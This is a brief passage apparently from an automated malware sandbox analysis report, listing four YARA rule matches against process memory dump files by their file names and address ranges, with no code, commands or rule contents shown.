Source: Yara match File source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY